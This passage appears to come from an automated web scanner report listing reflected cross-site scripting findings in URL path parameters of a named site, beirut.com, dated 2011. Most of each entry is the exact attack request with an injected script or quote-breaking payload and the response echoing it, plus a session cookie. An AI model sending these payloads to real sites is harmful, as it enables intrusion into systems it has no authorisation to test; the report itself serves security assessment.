Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:59:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Books Music Movies4e072<script>alert(1)</script>4f7f6dbcf6c <a href="#" id="backlink">
...[SNIP]...

4.728. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Bookshops/5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Bookshops/5

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38d8e"><a>ae77423f8af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping38d8e"><a>ae77423f8af/Books-Music-Movies/05084418/Bookshops/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:48:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping38d8e"><a>ae77423f8af">
...[SNIP]...

4.729. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Bookshops/5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Bookshops/5

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9bc3'-alert(1)-'4dd26508804 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppingb9bc3'-alert(1)-'4dd26508804/Books-Music-Movies/05084418/Bookshops/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:59:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shoppingb9bc3'-alert(1)-'4dd26508804/Books-Music-Movies/05084418/Bookshops/5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.730. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Bookshops/5 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Bookshops/5

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6c03'-alert(1)-'62fb6b285db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Books-Music-Moviesf6c03'-alert(1)-'62fb6b285db/05084418/Bookshops/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:07:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Books-Music-Moviesf6c03'-alert(1)-'62fb6b285db/05084418/Bookshops/5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.731. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Bookshops/5 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Bookshops/5

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 46801<script>alert(1)</script>5e38308e28a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Books-Music-Movies46801<script>alert(1)</script>5e38308e28a/05084418/Bookshops/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:09:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Books Music Movies46801<script>alert(1)</script>5e38308e28a <a href="#" id="backlink">
...[SNIP]...

4.732. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Bookshops/5 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Bookshops/5

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c002'-alert(1)-'6820f139974 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Books-Music-Movies/050844185c002'-alert(1)-'6820f139974/Bookshops/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:16:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Books-Music-Movies/050844185c002'-alert(1)-'6820f139974/Bookshops/5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.733. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Bookshops/5 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Bookshops/5

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb77a'-alert(1)-'446509ffabe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Books-Music-Movies/05084418/Bookshopseb77a'-alert(1)-'446509ffabe/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:31:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Books-Music-Movies/05084418/Bookshopseb77a'-alert(1)-'446509ffabe/5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.734. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Bookshops/5 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Bookshops/5

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8e92'-alert(1)-'e32a804b249 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Books-Music-Movies/05084418/Bookshops/5e8e92'-alert(1)-'e32a804b249 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:43:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Books-Music-Movies/05084418/Bookshops/5e8e92'-alert(1)-'e32a804b249';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.735. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Movie-Rentals/3

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 466f3"><a>1a8722d16db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping466f3"><a>1a8722d16db/Books-Music-Movies/05084418/Movie-Rentals/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:47:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping466f3"><a>1a8722d16db">
...[SNIP]...

4.736. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Movie-Rentals/3

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c66c'-alert(1)-'eae7df1b843 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping3c66c'-alert(1)-'eae7df1b843/Books-Music-Movies/05084418/Movie-Rentals/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:55:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping3c66c'-alert(1)-'eae7df1b843/Books-Music-Movies/05084418/Movie-Rentals/3';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.737. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Movie-Rentals/3

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbff0'-alert(1)-'1b41822ee5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Books-Music-Moviesbbff0'-alert(1)-'1b41822ee5a/05084418/Movie-Rentals/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:02:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Books-Music-Moviesbbff0'-alert(1)-'1b41822ee5a/05084418/Movie-Rentals/3';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.738. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Movie-Rentals/3

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce2d2<script>alert(1)</script>8528b945f37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Books-Music-Moviesce2d2<script>alert(1)</script>8528b945f37/05084418/Movie-Rentals/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:04:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Books Music Moviesce2d2<script>alert(1)</script>8528b945f37 <a href="#" id="backlink">
...[SNIP]...

4.739. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Movie-Rentals/3

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11cb5'-alert(1)-'91c08c29f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Books-Music-Movies/0508441811cb5'-alert(1)-'91c08c29f3/Movie-Rentals/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:15:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Books-Music-Movies/0508441811cb5'-alert(1)-'91c08c29f3/Movie-Rentals/3';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.740. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Movie-Rentals/3

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 972fb'-alert(1)-'d8b8b2132af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Books-Music-Movies/05084418/Movie-Rentals972fb'-alert(1)-'d8b8b2132af/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
